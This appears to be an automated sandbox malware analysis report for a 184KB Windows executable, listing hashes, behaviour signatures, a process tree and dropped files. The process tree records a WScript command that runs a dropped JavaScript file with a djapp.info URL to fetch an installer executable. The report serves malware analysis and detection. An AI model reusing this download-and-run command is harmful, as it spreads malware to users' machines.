Analysis

  • max time kernel
    121s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    11-05-2024 12:32

General

  • Target

    349a524964cc89c86fb99b9ba2d9444b_JaffaCakes118.exe

  • Size

    184KB

  • MD5

    349a524964cc89c86fb99b9ba2d9444b

  • SHA1

    5dcb9da0d327b00eb9974d46787b0ba73cc71d62

  • SHA256

    a053df342e76cae0b28561a8653dc4505cb9dc8e6df5beeb6f26d22b3fa18bd2

  • SHA512

    dd6ca285abf640a62bb4b118495cd565d4a1528104d4cbe09201596214100bfbf8e9ab5a73ab64e74cf62b7a7f74ab9d1035f6cefd48ce6066ac85649e9705fb

  • SSDEEP

    3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3x:/7BSH8zUB+nGESaaRvoB7FJNndnc

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 11 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\349a524964cc89c86fb99b9ba2d9444b_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\349a524964cc89c86fb99b9ba2d9444b_JaffaCakes118.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2124
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1593.js" http://www.djapp.info/?domain=eWZnhdHUsC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1593.exe
      2⤵
      • Blocklisted process makes network request
      PID:2916
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1593.js" http://www.djapp.info/?domain=eWZnhdHUsC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1593.exe
      2⤵
      • Blocklisted process makes network request
      PID:2676
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1593.js" http://www.djapp.info/?domain=eWZnhdHUsC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1593.exe
      2⤵
      • Blocklisted process makes network request
      PID:2764
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1593.js" http://www.djapp.info/?domain=eWZnhdHUsC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1593.exe
      2⤵
      • Blocklisted process makes network request
      PID:2348
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1593.js" http://www.djapp.info/?domain=eWZnhdHUsC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1593.exe
      2⤵
      • Blocklisted process makes network request
      PID:1976

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

    Filesize

    1KB

    MD5

    57b1b5453fd21a15ec32fee93515efbe

    SHA1

    71b7fea3000a04bee4b875834101cc64ddccc72b

    SHA256

    c4f6569e2a98b4523a8a772c1d55461e9e3415712bb423e9d8ba1b70ac509aa2

    SHA512

    4eee10ed4dc800964073ac65d2569e1713a0d0539ac275ff511c06bdcca63f2b2c8cf59961bdf63406277931360f39657526d56e453f5b097b897882e2a2e8cc

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

    Filesize

    724B

    MD5

    8202a1cd02e7d69597995cabbe881a12

    SHA1

    8858d9d934b7aa9330ee73de6c476acf19929ff6

    SHA256

    58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

    SHA512

    97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

    Filesize

    410B

    MD5

    1e3a95dd4102af73fbd598d23edae461

    SHA1

    25c359208e6de93f6f0e6de771c86952cd2d8a64

    SHA256

    abdc767e4380670689a6622d6e1e37863c07172d1d9a9cbbb6e99a31460a4e62

    SHA512

    0eb606dfd465b64bcde766672a2f835cddc12dba45c1d4ec4ebaef81ef9c62ace118e3a83a57874aa2dfcaa6584a64b00e5eb0bcbd506a9ad354f41c9b30e6ce

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    06cd939f3ffaa3032823ed11ef9f3d1f

    SHA1

    71e29d1999c4b524e17e02e0d4e5296722582d43

    SHA256

    e5ef17ee50030f5e79e6816b6902a3f23db03b007b3806fe5588a25dc69b923b

    SHA512

    bf4bf4b185fb68e21cb5f9ea3237688e70d2738302c152f23394cd95ac472d041c4d94550365008abc772fb35fec89af0bf6bfa491ee21f8544b9145e1803d5f

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

    Filesize

    392B

    MD5

    f1d505ce47713eb394f657b26a493251

    SHA1

    9780c4234da778de8f800e8a6252c8ce883eee65

    SHA256

    6f1a97f4b0b1f6282a57f728b94fd0e8856e68d7736fcc3c267dbdbaa8a599eb

    SHA512

    963f74a4720acbfe33006dbdacef7217993cc8ee68abe9f822cef7aa9059fee458c782f26159075f42d433f2d718cc4b45d51bd1404afcb33591c117d11ea089

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3NPBB818\domain_profile[1].htm

    Filesize

    40KB

    MD5

    d202c1bd6afa688e65943f99dc7c09d0

    SHA1

    718c32173ca945ae1582e813667b325896148447

    SHA256

    4fcb111420a690cee8d767e163443564948b27c0b30f67bd312e4165022dfb69

    SHA512

    41dc2ee50c21275cc7395a45fb74e3cd53e3ceeb8e60d3032024592496f4f635c8f7346eddc56e52accf61d8606f1be77cceb9d6e723fc665704bfc3966f7ec2

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3NPBB818\domain_profile[1].htm

    Filesize

    6KB

    MD5

    58d012284e82556163670c914a5c02d4

    SHA1

    154cd289dfedb8a937e64bc1de2580786cf3d384

    SHA256

    f904083ec2068d7f3efc04512f9638dcb8bc6bf28f53626a3f726403f0c306dc

    SHA512

    f0d65111699dbdcb5195a2b63826a69c9088cadc1e4e51499e0fb9fb3c3ed47aa16b5991544d78e75727971982466082b8a7bd39bc26b2b1e2e55b50e908ee0c

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EDQW9R5V\domain_profile[1].htm

    Filesize

    40KB

    MD5

    0ded63278561c542a0bf8e00a9ed93cd

    SHA1

    cdc18a11f1663afdd218df61d8a03d62a2482989

    SHA256

    473050b5c31158f353c0385e05c5bfccc9a41f068c7a4289db671bf6adea7181

    SHA512

    7fe931b617d03ee3d4de5be06a5c1080800a12d766407e90a99bc85b84b5833e690c7e6c7704a30198930fdf72aa60febfe8520a56c2db6be1a287506f3cf898

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EDQW9R5V\domain_profile[1].htm

    Filesize

    40KB

    MD5

    f2cdedcba91bf71f10990a9ebca5da20

    SHA1

    deb1451760d0f37ea3fa7b350fb57c6fbe76a2d7

    SHA256

    874921d68f3c98e5d94f175fff31ba3a743dc7645b50b34858283febc0afe428

    SHA512

    8d96f7c6a45a0d91b21b3c20beb13129da41c45257b5f0f349acf7b4c69c02feb032be0e40eee1b8256e923c72350489e8c318b8f1fe04b4733bd196acd99784

  • C:\Users\Admin\AppData\Local\Temp\Cab453A.tmp

    Filesize

    65KB

    MD5

    ac05d27423a85adc1622c714f2cb6184

    SHA1

    b0fe2b1abddb97837ea0195be70ab2ff14d43198

    SHA256

    c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

    SHA512

    6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

  • C:\Users\Admin\AppData\Local\Temp\Tar5D9B.tmp

    Filesize

    171KB

    MD5

    9c0c641c06238516f27941aa1166d427

    SHA1

    64cd549fb8cf014fcd9312aa7a5b023847b6c977

    SHA256

    4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

    SHA512

    936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

  • C:\Users\Admin\AppData\Local\Temp\fuf1593.js

    Filesize

    3KB

    MD5

    3813cab188d1de6f92f8b82c2059991b

    SHA1

    4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

    SHA256

    a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

    SHA512

    83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\2XEOBMTX.txt

    Filesize

    173B

    MD5

    286ef38304737b08a11fa89894102be3

    SHA1

    622478c94c2d1923ef6b7e3d2f449687297db43d

    SHA256

    de76be272acc05b2c024fa89a6087d56a99b501859941603071cf93e9d75b4c2

    SHA512

    03e5dc0cc962e6589cc7bb92b628377d7fde25aaf84eb276ef021f72401cc6f8d297c687f1d6e1eae3dd897dc0e063f6c49605c04be84428e79de371b8a0f99c